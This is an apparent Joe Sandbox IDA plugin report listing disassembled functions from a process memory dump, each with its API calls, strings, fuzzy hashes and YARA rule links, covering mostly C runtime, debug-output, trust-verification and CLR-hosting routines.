Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: 7882c181e7089931faa2f74e932d1e474fa724ceef338d6565d2e8bf58ac212a
Instruction ID: 67ede7757becb3f9c4e10d3461800679765fb59b20569eb05e17b490ec83359f
Opcode Fuzzy Hash: 7882c181e7089931faa2f74e932d1e474fa724ceef338d6565d2e8bf58ac212a
Instruction Fuzzy Hash: 4C31713AB08F8186EB208F24E8646ED33A0FB88B59F540135EA9D47B9DDF3CC1458B00

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CECD40 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 282COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDF7CF1120: GetModuleHandleW.KERNEL32 ref: 00007FFDF7CF116F
Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1188
Part of subcall function 00007FFDF7CF1120: GetProcAddress.KERNEL32 ref: 00007FFDF7CF1198
Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF13A3
Part of subcall function 00007FFDF7CF1120: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF142E

OutputDebugStringA.KERNEL32 ref: 00007FFDF7CECE02
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CECE34

Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0268
Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0A7F
Part of subcall function 00007FFDF7CF01D0: HeapFree.KERNEL32 ref: 00007FFDF7CF0ACE
Part of subcall function 00007FFDF7CF01D0: OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0B10

Strings

API called without activation, xrefs: 00007FFDF7CECE2D, 00007FFDF7CECE3A
PRAGMA page_count, xrefs: 00007FFDF7CECE67
API called without license: %ld (0x%lx), xrefs: 00007FFDF7CECDE7

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: DebugOutputString$AddressFreeHandleHeapModuleProc
String ID: API called without activation$API called without license: %ld (0x%lx)$PRAGMA page_count
API String ID: 323638051-2855109959
Opcode ID: 0ed92a6e947227e400705dd0be345b766333ae9d39c5e387351c67d9e806e4e5
Instruction ID: 0924389fb91bc44105ea46a84940f501e9bfc722f4c0b4896738ff6ffdaa64ae
Opcode Fuzzy Hash: 0ed92a6e947227e400705dd0be345b766333ae9d39c5e387351c67d9e806e4e5
Instruction Fuzzy Hash: C0D1912AF08B8681E7118B399821BFD2360FB94B88F449235DF5D4769AEF3CE5C58300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA5944 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 262COMMON

Download Yara Rule

APIs

_handle_error.LIBCMT ref: 00007FFDF7CA5A96

Strings

VUUU, xrefs: 00007FFDF7CA5B63
!, xrefs: 00007FFDF7CA5A82
fmod, xrefs: 00007FFDF7CA5A60

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _handle_error
String ID: !$VUUU$fmod
API String ID: 1757819995-2579133210
Opcode ID: 0a2296e2cc2c192fc8cf10e9e28824e374f36c164843ed6a42680754565d6b7c
Instruction ID: 564bee2dacc60add6f16e7fba181bb19c431d4c7e94c11d4100298bdf85e5488
Opcode Fuzzy Hash: 0a2296e2cc2c192fc8cf10e9e28824e374f36c164843ed6a42680754565d6b7c
Instruction Fuzzy Hash: 69B1ED25F1CFC545E7A38A3464617FAB259AFAB391F10C332D96E35AA4DF2C94C28700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB1BA4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB1BD4

Part of subcall function 00007FFDF7CAD6F4: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FFDF7CAD6D2), ref: 00007FFDF7CAD6FD
Part of subcall function 00007FFDF7CAD6F4: GetCurrentProcess.KERNEL32(?,?,?,?,00007FFDF7CAD6D2), ref: 00007FFDF7CAD721

Strings

., xrefs: 00007FFDF7CB1FF4
*?, xrefs: 00007FFDF7CB1BFB

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: CurrentFeaturePresentProcessProcessor_invalid_parameter_noinfo
String ID: *?$.
API String ID: 4036615347-3972193922
Opcode ID: ba49eb8bdd0d3c5667b6a49b38d1b5bbf7d7fd221cdccd7b19d09b57c7884ac6
Instruction ID: 5956a5bc84e967caef953ee78fb1e1cb2faef49e75a2d733633a88b6fda3e4a2
Opcode Fuzzy Hash: ba49eb8bdd0d3c5667b6a49b38d1b5bbf7d7fd221cdccd7b19d09b57c7884ac6
Instruction Fuzzy Hash: B751C16AF14B9586EB11DFA6A8208FD67A4FB54BD8B444531EE2D17BC9DE3CD0518300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB8FE0 Relevance: 1.5, APIs: 1, Instructions: 18encryptionCOMMON

Download Yara Rule

APIs

CryptReleaseContext.ADVAPI32 ref: 00007FFDF7CB8FFD

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: ContextCryptRelease
String ID:
API String ID: 829835001-0
Opcode ID: eb429f9e11284ecf835b6a58d229ed5bdb84f0074435d393edd3b9aa5fac39f0
Instruction ID: 2a196f16231dd43ac5b026ab3f442fc46cec921b780abacc44888b1aad5eeb33
Opcode Fuzzy Hash: eb429f9e11284ecf835b6a58d229ed5bdb84f0074435d393edd3b9aa5fac39f0
Instruction Fuzzy Hash: DBE0122DF46246C5FF699B65B874BB822605F9CB44F589130E92E062C9DE3C54E58640

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CF0F90 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 92memoryCOMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0FEB
HeapAlloc.KERNEL32 ref: 00007FFDF7CF1001
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF1016
WinVerifyTrust.WINTRUST ref: 00007FFDF7CF10DA
HeapFree.KERNEL32 ref: 00007FFDF7CF10EF

Strings

cannot trust, cannot allocate., xrefs: 00007FFDF7CF100F
cannot trust, heap invalid., xrefs: 00007FFDF7CF0FE4
cannot trust, no module file name., xrefs: 00007FFDF7CF1052

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: DebugHeapOutputString$AllocFreeTrustVerify
String ID: cannot trust, cannot allocate.$cannot trust, heap invalid.$cannot trust, no module file name.
API String ID: 133523416-3277164374
Opcode ID: a111077ec395828ad44bbf49c10331e97aa6e55935c10e2f2f2ef4da38a20de8
Instruction ID: e1ccc910edbbc8b27323037967a3f9d90539566cf5ac96110dd2a25cef22ce98
Opcode Fuzzy Hash: a111077ec395828ad44bbf49c10331e97aa6e55935c10e2f2f2ef4da38a20de8
Instruction Fuzzy Hash: D3415135B08A82CAF710CF65E864BED37A2AB48B58F444235DE1D576DCEF7C94498740

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB1064 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 117COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB11E1

Strings

inf, xrefs: 00007FFDF7CB10EA
nan(snan), xrefs: 00007FFDF7CB1104
NAN, xrefs: 00007FFDF7CB10C5
NAN(IND), xrefs: 00007FFDF7CB110F
nan(ind), xrefs: 00007FFDF7CB111A
nan, xrefs: 00007FFDF7CB10CC
INF, xrefs: 00007FFDF7CB10D7
NAN(SNAN), xrefs: 00007FFDF7CB10F9

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
API String ID: 3215553584-2617248754
Opcode ID: 431d28ebabc8565c10fbdd6955dc7b829cb458b6cd5c121fb79e91223151176a
Instruction ID: 64d937c92837b970a5e05a56799b0b5f7847210f75ea9c5e538b6593e7575123
Opcode Fuzzy Hash: 431d28ebabc8565c10fbdd6955dc7b829cb458b6cd5c121fb79e91223151176a
Instruction Fuzzy Hash: 64419C7AB09B8589F700CF25E861BED33A4EB15798F044536EE6D0BB98DE3DD1298340

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CF0100 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 44COMMON

Download Yara Rule

APIs

OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF012A
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0146
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF0189
OutputDebugStringA.KERNEL32 ref: 00007FFDF7CF01A7

Strings

done with cleanup., xrefs: 00007FFDF7CF0199
invalid ICLRRuntimeHost pointer., xrefs: 00007FFDF7CF0123
invalid ICLRRuntimeHost., xrefs: 00007FFDF7CF013F
eeeSdk1: %s HRESULT 0x%016X, xrefs: 00007FFDF7CF016E
VerifyClrCleanup, xrefs: 00007FFDF7CF0163

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: DebugOutputString
String ID: VerifyClrCleanup$done with cleanup.$eeeSdk1: %s HRESULT 0x%016X$invalid ICLRRuntimeHost pointer.$invalid ICLRRuntimeHost.
API String ID: 1166629820-803544626
Opcode ID: dfd235dc89044e830d0663335d1feb6957c3838e51d008614289ecca82846f2d
Instruction ID: 2db7f2edd228a4e50fb48da33ad85e7ea21dc81a66509ef91f3c0ed7acd0ed01
Opcode Fuzzy Hash: dfd235dc89044e830d0663335d1feb6957c3838e51d008614289ecca82846f2d
Instruction Fuzzy Hash: FC111C29B28A82D2FB11DB20F875BF92361BF88B04F804136D96E466D8EF3DD544C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CA6AB0 Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 492COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA6AEB
_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA6EBC
_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CA715D

Strings

p, xrefs: 00007FFDF7CA6BF8
-, xrefs: 00007FFDF7CA6B65
f, xrefs: 00007FFDF7CA6BF0
+, xrefs: 00007FFDF7CA6B70

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: +$-$f$p
API String ID: 3215553584-588565063
Opcode ID: 18cdb82c33907fb803bb1e5d23cd3fcdbf2b03280e4c7c547309946e042c8b78
Instruction ID: 68773a52f8be05d11cc9c9ceb767e2934d1d608d3d4771f35a98af6f78174f4f
Opcode Fuzzy Hash: 18cdb82c33907fb803bb1e5d23cd3fcdbf2b03280e4c7c547309946e042c8b78
Instruction Fuzzy Hash: B612812AF1814386FB209B15E438AFE6653FB54B56F944231E6F91B6CCCB3DE9408B44

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAF538 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 155timeCOMMON

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FFDF7CAF55B

Part of subcall function 00007FFDF7CAEACC: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEAE0

_get_daylight.LIBCMT ref: 00007FFDF7CAF56C

Part of subcall function 00007FFDF7CAEA6C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEA80

_get_daylight.LIBCMT ref: 00007FFDF7CAF57D

Part of subcall function 00007FFDF7CAEA9C: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CAEAB0

Part of subcall function 00007FFDF7CAC8AC: HeapFree.KERNEL32(?,?,00000000,00007FFDF7CADBDB,?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000), ref: 00007FFDF7CAC8C2
Part of subcall function 00007FFDF7CAC8AC: GetLastError.KERNEL32(?,?,00000000,00007FFDF7CADBDB,?,?,?,00007FFDF7CA7B91,?,?,?,?,00007FFDF7CACA6B,?,?,00000000), ref: 00007FFDF7CAC8D4

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FFDF7CAF7DD), ref: 00007FFDF7CAF5A4
WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CAF63A
WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CAF686

Strings

?, xrefs: 00007FFDF7CAF679

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ByteCharMultiWide$ErrorFreeHeapInformationLastTimeZone
String ID: ?
API String ID: 500310315-1684325040
Opcode ID: c87be684c8d8dbe1b2cece34fb08483f7c6331edfb0cc895426dac4484e7cc59
Instruction ID: bc911981228153c29be2f94b65042e8eb51810a216c39ad0259107b124b52289
Opcode Fuzzy Hash: c87be684c8d8dbe1b2cece34fb08483f7c6331edfb0cc895426dac4484e7cc59
Instruction Fuzzy Hash: 7D618D3AF0864286F7509F20E8709ED7BA4FB88794F440136EA6E4B6E9DF3CD9518750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CAB0A8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 167COMMON

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FFDF7CAB10B
_set_statfp.LIBCMT ref: 00007FFDF7CAB12F

Strings

cosh, xrefs: 00007FFDF7CAB16E
", xrefs: 00007FFDF7CAB18C

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _set_statfp
String ID: "$cosh
API String ID: 1156100317-3800341493
Opcode ID: 10f1eb77e07d5d9682f41bee9aa1c77003cc7ed58aa9e9aa20d022d0afb58274
Instruction ID: b3225a0a4e162e16e4d3062cae50847e925ac84f6c5e024613d5c064d4c0cebe
Opcode Fuzzy Hash: 10f1eb77e07d5d9682f41bee9aa1c77003cc7ed58aa9e9aa20d022d0afb58274
Instruction Fuzzy Hash: 14819925F28FC588E3638B3494617FA7358AF6A3D5F119337D56E366A5DF2CA0828600

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CABAEC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FFDF7CABB0C
GetProcAddress.KERNEL32 ref: 00007FFDF7CABB22
FreeLibrary.KERNEL32 ref: 00007FFDF7CABB47

Strings

mscoree.dll, xrefs: 00007FFDF7CABB03
CorExitProcess, xrefs: 00007FFDF7CABB1B

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c6323586da4edf6de2700d7ac411e7cc218df0fa7115b9235c3ab1ed59015440
Instruction ID: df3cbdffbbf7bcdadfdcf2c32ef112de38ed4a7744c0f8e4c84f04c0e297a3b0
Opcode Fuzzy Hash: c6323586da4edf6de2700d7ac411e7cc218df0fa7115b9235c3ab1ed59015440
Instruction Fuzzy Hash: 60F04469B19B8781FF448B11F8B4AF96360EF88B91F881135D92F466ACDE3CD484C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB838C Relevance: 7.8, APIs: 5, Instructions: 265COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a98bd3957bab17e9afb37376b2856478995e11a05b8d07082f607296a44f1422
Instruction ID: e345a6f8f5d5e61cbb76f76ab18d29f1a649f3be93852b1783ad58880e69a857
Opcode Fuzzy Hash: a98bd3957bab17e9afb37376b2856478995e11a05b8d07082f607296a44f1422
Instruction Fuzzy Hash: B1A1C16AB0878249FB608B689470BFD66D5AF44BA4F484635EA3D077C9DF3CD4748780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB7C78 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FFDF7CB7CBD

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

Associated: 00000005.00000002.1779503007.00007FFDF7CA0000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781114786.00007FFDF7DFE000.00000002.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781519730.00007FFDF7E42000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781656419.00007FFDF7E43000.00000008.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781728705.00007FFDF7E46000.00000004.00000001.01000000.0000000E.sdmpDownload File
Associated: 00000005.00000002.1781824762.00007FFDF7E48000.00000002.00000001.01000000.0000000E.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdf7ca0000_main.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: ad6755d9bc6c2d2c1049bf8c83b093eff4b5d739628207f99e0a129a86b41aa0
Instruction ID: 5f5bf32b8c26d959745c7911ca0b40bbb6bdd7a2244785645b73690959e03659
Opcode Fuzzy Hash: ad6755d9bc6c2d2c1049bf8c83b093eff4b5d739628207f99e0a129a86b41aa0
Instruction Fuzzy Hash: F181A52AF1865289F7219F6A9460AFD27A0BF48794F404136ED2E577E9DF3CE861C310

Uniqueness

Uniqueness Score: -1.00%

Function 00007FFDF7CB75EC Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FFDF7CB7E1F), ref: 00007FFDF7CB7649
WideCharToMultiByte.KERNEL32 ref: 00007FFDF7CB7725
WriteFile.KERNEL32 ref: 00007FFDF7CB774B
WriteFile.KERNEL32 ref: 00007FFDF7CB778A
GetLastError.KERNEL32 ref: 00007FFDF7CB77C2

Memory Dump Source

Source File: 00000005.00000002.1779539396.00007FFDF7CA1000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFDF7CA0000, based on PE: true

